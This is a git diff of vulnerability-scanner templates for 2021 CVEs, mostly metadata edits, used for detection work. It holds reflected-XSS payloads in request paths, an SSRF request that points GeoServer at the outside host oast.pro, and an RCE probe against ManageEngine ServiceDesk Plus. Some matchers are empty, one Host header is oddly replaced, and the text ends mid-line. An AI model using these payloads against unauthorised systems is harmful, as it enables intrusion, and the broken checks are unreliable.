tags: xss,cve,cve2021,cliniccases
requests:
diff --git a/poc/cve/cve-2021-39320.yaml b/poc/cve/cve-2021-39320.yaml
new file mode 100644
index 0000000000..6e634f1073
--- /dev/null
+++ b/poc/cve/cve-2021-39320.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-39320
+
+info:
+ name: WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting
+ author: dhiyaneshDK
+ severity: medium
+ description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
+ reference:
+ - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-39320
+ - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-39320
+ cwe-id: CWE-79
+ tags: wordpress,xss,cve,cve2021,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/23
diff --git a/poc/cve/cve-2021-39322.yaml b/poc/cve/cve-2021-39322.yaml
index 1974b6aa52..80b3ada7a5 100644
--- a/poc/cve/cve-2021-39322.yaml
+++ b/poc/cve/cve-2021-39322.yaml
@@ -4,13 +4,15 @@ info:
name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
- description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path."
+ description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
reference:
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322
+ - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322
+ - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-39322
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated
diff --git a/poc/cve/cve-2021-39327.yaml b/poc/cve/cve-2021-39327.yaml
index 0e348c2036..f78e4f755b 100644
--- a/poc/cve/cve-2021-39327.yaml
+++ b/poc/cve/cve-2021-39327.yaml
@@ -4,17 +4,17 @@ info:
name: WordPress BulletProof Security 5.1 Information Disclosure
author: geeknik
severity: medium
- description: "The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1."
+ description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.
reference:
- https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327
- https://nvd.nist.gov/vuln/detail/CVE-2021-39327
- tags: cve,cve2021,wordpress,exposures
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
cve-id: CVE-2021-39327
cwe-id: CWE-200
+ tags: cve,cve2021,wordpress,exposures
requests:
- method: GET
diff --git a/poc/cve/cve-2021-39433.yaml b/poc/cve/cve-2021-39433.yaml
index 6811778843..bbc07f241b 100644
--- a/poc/cve/cve-2021-39433.yaml
+++ b/poc/cve/cve-2021-39433.yaml
@@ -4,15 +4,16 @@ info:
name: BIQS IT Biqs-drive v1.83 Local File Inclusion
author: Veshraj
severity: high
- description: "A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user."
+ description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
reference:
- https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
- tags: lfi,biqsdrive,cve,cve2021
+ - https://biqs-drive.be/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2021-39433
+ tags: lfi,biqsdrive,cve,cve2021
requests:
- method: GET
diff --git a/poc/cve/cve-2021-40539.yaml b/poc/cve/cve-2021-40539.yaml
index 5315ae83ea..685aa50014 100644
--- a/poc/cve/cve-2021-40539.yaml
+++ b/poc/cve/cve-2021-40539.yaml
@@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-40539
cwe-id: CWE-287
- tags: cve,cve2021,rce,ad,intrusive,manageengine,kev
+ tags: cve,cve2021,rce,ad,intrusive,manageengine
requests:
diff --git a/poc/cve/cve-2021-40542.yaml b/poc/cve/cve-2021-40542.yaml
index dad744396d..247ec475a8 100644
--- a/poc/cve/cve-2021-40542.yaml
+++ b/poc/cve/cve-2021-40542.yaml
@@ -1,17 +1,18 @@
id: CVE-2021-40542
info:
- name: Opensis-Classic 8.0 Reflected Cross-Site Scripting
+ name: Opensis-Classic 8.0 - Reflected Cross-Site Scripting
author: alph4byt3
severity: medium
- description: Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
+ description: |
+ Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
reference:
- https://github.com/OS4ED/openSIS-Classic/issues/189
- https://nvd.nist.gov/vuln/detail/CVE-2021-40542
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2021-38704
+ cvss-score: 6.1
+ cve-id: CVE-2021-40542
cwe-id: CWE-79
tags: xss,cve,cve2021,opensis
diff --git a/poc/cve/cve-2021-40822.yaml b/poc/cve/cve-2021-40822.yaml
index a5f8bde585..cb5258cfc8 100644
--- a/poc/cve/cve-2021-40822.yaml
+++ b/poc/cve/cve-2021-40822.yaml
@@ -2,46 +2,58 @@ id: CVE-2021-40822
info:
name: Geoserver - Server-Side Request Forgery
- author: For3stCo1d
+ author: For3stCo1d,aringo-bf
severity: high
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
+ impact: |
+ Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
+ remediation: |
+ Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability.
reference:
- https://gccybermonks.com/posts/cve-2021-40822/
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
- https://github.com/geoserver/geoserver/releases
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
+ - https://osgeo-org.atlassian.net/browse/GEOS-10229
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40822
cwe-id: CWE-918
+ epss-score: 0.68366
+ epss-percentile: 0.97892
+ cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
metadata:
+ verified: true
+ max-request: 1
+ vendor: osgeo
+ product: geoserver
+ shodan-query: title:"GeoServer"
fofa-query: app="GeoServer"
- verified: "true"
- tags: cve,cve2021,ssrf,geoserver
+ tags: cve2021,cve,ssrf,geoserver,osgeo
-requests:
+http:
- raw:
- |
POST /geoserver/TestWfsPost HTTP/1.1
- Host: {{Hostname}}
+ Host: oast.pro
Content-Type: application/x-www-form-urlencoded
- form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+ form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
matchers-condition: and
matchers:
- type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: body
words:
- - "http"
+ - "Interactsh"
- type: word
+ part: header
words:
- - ""
+ - "text/html"
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/06/30
+# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-41192.yaml b/poc/cve/cve-2021-41192.yaml
index c1d124c9c0..dba2a044ba 100644
--- a/poc/cve/cve-2021-41192.yaml
+++ b/poc/cve/cve-2021-41192.yaml
@@ -4,19 +4,19 @@ info:
name: Redash Setup Configuration - Default Secrets Disclosure
author: bananabr
severity: medium
- description: "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value."
+ description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
reference:
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
- metadata:
- shodan-query: http.favicon.hash:698624197
- tags: cve,cve2021,redash,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
- cvss-score: 6.50
+ cvss-score: 6.5
cve-id: CVE-2021-41192
cwe-id: CWE-1188
+ metadata:
+ shodan-query: http.favicon.hash:698624197
+ tags: cve,cve2021,redash,auth-bypass
requests:
- method: GET
diff --git a/poc/cve/cve-2021-41266.yaml b/poc/cve/cve-2021-41266.yaml
index 9819fab0ae..5aed4ef4ea 100644
--- a/poc/cve/cve-2021-41266.yaml
+++ b/poc/cve/cve-2021-41266.yaml
@@ -6,17 +6,19 @@ info:
severity: critical
description: |
MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
- remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
- https://github.com/minio/console/pull/1217
- tags: cve,cve2021,minio
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2021-41266
cwe-id: CWE-306
+ remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside
+ the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes
+ service account token.'
+ tags: cve,cve2021,minio
requests:
- raw:
diff --git a/poc/cve/cve-2021-41467.yaml b/poc/cve/cve-2021-41467.yaml
index 3bb1e8ed25..d82d191d05 100644
--- a/poc/cve/cve-2021-41467.yaml
+++ b/poc/cve/cve-2021-41467.yaml
@@ -8,14 +8,14 @@ info:
reference:
- https://github.com/hjue/JustWriting/issues/106
- https://nvd.nist.gov/vuln/detail/CVE-2021-41467
+ - https://github.com/hjue/JustWriting/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-41467
cwe-id: CWE-79
tags: cve,cve2021,justwriting,xss
-
requests:
- method: GET
path:
diff --git a/poc/cve/cve-2021-41648.yaml b/poc/cve/cve-2021-41648.yaml
index 2708382c24..3df8e64753 100644
--- a/poc/cve/cve-2021-41648.yaml
+++ b/poc/cve/cve-2021-41648.yaml
@@ -9,12 +9,12 @@ info:
- https://github.com/MobiusBinary/CVE-2021-41648
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
- tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2021-41648
cwe-id: CWE-89
+ tags: cve,cve2021,sqli,injection
requests:
- method: POST
diff --git a/poc/cve/cve-2021-42063.yaml b/poc/cve/cve-2021-42063.yaml
index e9cc437e9a..bc30679e1d 100644
--- a/poc/cve/cve-2021-42063.yaml
+++ b/poc/cve/cve-2021-42063.yaml
@@ -11,16 +11,12 @@ info:
- https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
- https://twitter.com/MrTuxracer/status/1505934549217382409
- https://nvd.nist.gov/vuln/detail/CVE-2021-42063
- metadata:
- shodan-query:
- - 'SAP NetWeaver Application Server'
- - 'http.component:"SAP"'
- tags: cve,cve2021,sap,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-42063
cwe-id: CWE-79
+ tags: cve,cve2021,sap,xss
requests:
- method: GET
diff --git a/poc/cve/cve-2021-42565.yaml b/poc/cve/cve-2021-42565.yaml
index f860c4f25f..bd4c2bc4c6 100644
--- a/poc/cve/cve-2021-42565.yaml
+++ b/poc/cve/cve-2021-42565.yaml
@@ -1,16 +1,17 @@
id: CVE-2021-42565
info:
- author: madrobot
name: myfactory FMS - Reflected Cross-Site Scripting
+ author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42565
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+ - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-42565
cwe-id: CWE-79
tags: cve,cve2021,myfactory,xss
diff --git a/poc/cve/cve-2021-42566.yaml b/poc/cve/cve-2021-42566.yaml
new file mode 100644
index 0000000000..2ba8f6ef60
--- /dev/null
+++ b/poc/cve/cve-2021-42566.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-42566
+
+info:
+ name: myfactory FMS - Reflected Cross-Site Scripting
+ author: madrobot
+ severity: medium
+ description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42566
+ - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
+ - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-42566
+ cwe-id: CWE-79
+ tags: cve,cve2021,myfactory,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ""
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+# Enhanced by mp on 2022/02/28
diff --git a/poc/cve/cve-2021-43062.yaml b/poc/cve/cve-2021-43062.yaml
index 4be91bc361..03e6b3cd1f 100644
--- a/poc/cve/cve-2021-43062.yaml
+++ b/poc/cve/cve-2021-43062.yaml
@@ -9,9 +9,10 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-43062
- https://www.fortiguard.com/psirt/FG-IR-21-185
- https://www.exploit-db.com/exploits/50759
+ - https://fortiguard.com/advisory/FG-IR-21-185
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-43062
cwe-id: CWE-79
tags: cve,cve2021,fortimail,xss,fortinet
diff --git a/poc/cve/cve-2021-43495.yaml b/poc/cve/cve-2021-43495.yaml
index 82dd1cdab5..94f1e94c2e 100644
--- a/poc/cve/cve-2021-43495.yaml
+++ b/poc/cve/cve-2021-43495.yaml
@@ -4,16 +4,17 @@ info:
name: AlquistManager Local File Inclusion
author: pikpikcu
severity: high
- description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
+ description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical
+ secrets stored anywhere on the system and can significantly aid in getting remote code access.
reference:
- https://github.com/AlquistManager/alquist/issues/43
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
- tags: cve,cve2021,lfi,alquist
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2021-43495
cwe-id: CWE-22
+ tags: cve,cve2021,lfi,alquist
requests:
- method: GET
diff --git a/poc/cve/cve-2021-43496.yaml b/poc/cve/cve-2021-43496.yaml
index 8314bb7660..4b96e8518c 100644
--- a/poc/cve/cve-2021-43496.yaml
+++ b/poc/cve/cve-2021-43496.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/varun-suresh/Clustering/issues/12
- https://nvd.nist.gov/vuln/detail/CVE-2021-43496
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-43496
cwe-id: CWE-22
diff --git a/poc/cve/cve-2021-44077.yaml b/poc/cve/cve-2021-44077.yaml
new file mode 100644
index 0000000000..7353160d48
--- /dev/null
+++ b/poc/cve/cve-2021-44077.yaml
@@ -0,0 +1,46 @@
+id: CVE-2021-44077
+
+info:
+ name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution
+ author: Adam Crosser,gy741
+ severity: critical
+ description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+ remediation: |
+ Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine ServiceDesk Plus.
+ reference:
+ - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
+ - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
+ - https://github.com/horizon3ai/CVE-2021-44077
+ - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44077
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-44077
+ cwe-id: CWE-306
+ epss-score: 0.97367
+ epss-percentile: 0.99895
+ cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: zohocorp
+ product: manageengine_servicedesk_plus
+ tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/RestAPI/ImportTechnicians"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ' |